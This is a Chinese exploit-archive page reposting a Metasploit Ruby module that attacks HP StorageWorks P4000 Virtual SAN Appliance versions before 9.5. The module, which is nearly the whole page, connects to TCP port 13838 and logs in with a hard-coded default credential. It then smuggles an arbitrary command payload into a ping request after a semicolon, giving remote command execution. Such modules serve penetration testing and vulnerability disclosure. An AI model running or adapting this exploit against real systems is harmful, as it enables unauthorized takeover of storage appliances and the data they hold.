首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
HP StorageWorks P4000 Virtual SAN Appliance Command Execution
来源:http://www.metasploit.com 作者:sinn3r 发布时间:2012-05-22  

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
 Rank = ExcellentRanking

 include Msf::Exploit::Remote::Tcp

 def initialize(info={})
  super(update_info(info,
   'Name'           => "HP StorageWorks P4000 Virtual SAN Appliance Command Execution",
   'Description'    => %q{
     This module exploits a vulnerability found in HP's StorageWorks P4000 VSA,
    versions prior to 9.5.  By using a default account credential, it is possible
    to inject arbitrary commands as part of a ping request via port 13838.
   },
   'License'        => MSF_LICENSE,
   'Author'         =>
    [
     'Nicolas Gregoire',  #Discovery, PoC, additional assistance
     'sinn3r'             #Metasploit
    ],
   'References'     =>
    [
     ['EDB', '18893'],
     ['URL', 'http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?loc=en_US&id=958'],
     ['URL', 'http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c03082086']
    ],
   'Payload'        =>
    {
     'BadChars' => "/",
     'Compat'   =>
      {
       'PayloadType' => 'cmd',
       'RequiredCmd' => 'generic perl telnet bash'
      }
    },
   'DefaultOptions'  =>
    {
     'ExitFunction' => "none"
    },
   'Platform'       => ['unix', 'linux'],
   'Arch'           => ARCH_CMD,
   'Targets'        =>
    [
     ['HP VSA prior to 9.5', {}]
    ],
   'Privileged'     => false,
   'DisclosureDate' => "Nov 11 2011",
   'DefaultTarget'  => 0))

  register_options(
   [
    OptPort.new('RPORT', [true, 'The remote port', 13838])
   ], self.class)
 end


 def generate_packet(data)
  pkt = "\x00\x00\x00\x00\x00\x00\x00\x01"
  pkt << [data.length + 1].pack("N*")
  pkt << "\x00\x00\x00\x00"
  pkt << "\x00\x00\x00\x00\x00\x00\x00\x00"
  pkt << "\x00\x00\x00\x14\xff\xff\xff\xff"
  pkt << data
  pkt << "\x00"

  pkt
 end


 def exploit
  connect

  # Login packet
  print_status("Sending login packet")
  packet = generate_packet("login:/global$agent/L0CAlu53R/Version \"8.5.0\"")
  sock.put(packet)
  res = sock.get_once
  vprint_status(Rex::Text.to_hex_dump(res)) if res

  # Command execution
  print_status("Sending injection")
  data = "get:/lhn/public/network/ping/127.0.0.1/foobar;#{payload.encoded}/"
  packet = generate_packet(data)
  sock.put(packet)
  res = sock.get_once
  vprint_status(Rex::Text.to_hex_dump(res)) if res

  handler
  disconnect
 end
end


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Mozilla FireFox 12.0 Memory Co
·Real-DRAW PRO 5.2.4 Import Fil
·PHP 5.3.11 (win) Local Denial
·DVD-Lab Studio 1.25 DAL File O
·PHP 5.4 (5.4.3) Code Execution
·Foxit Reader 3.0 Open Execute
·SkinCrafter 3.0 Buffer Overflo
·PHP <= 5.4.3 wddx_serialize_*
·Active Collab "chat module" <=
·PHP <= 5.4.3 (com_event_sink)
·Oracle Weblogic Apache Connect
·Supernews <= 2.6.1 SQL Injecti
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved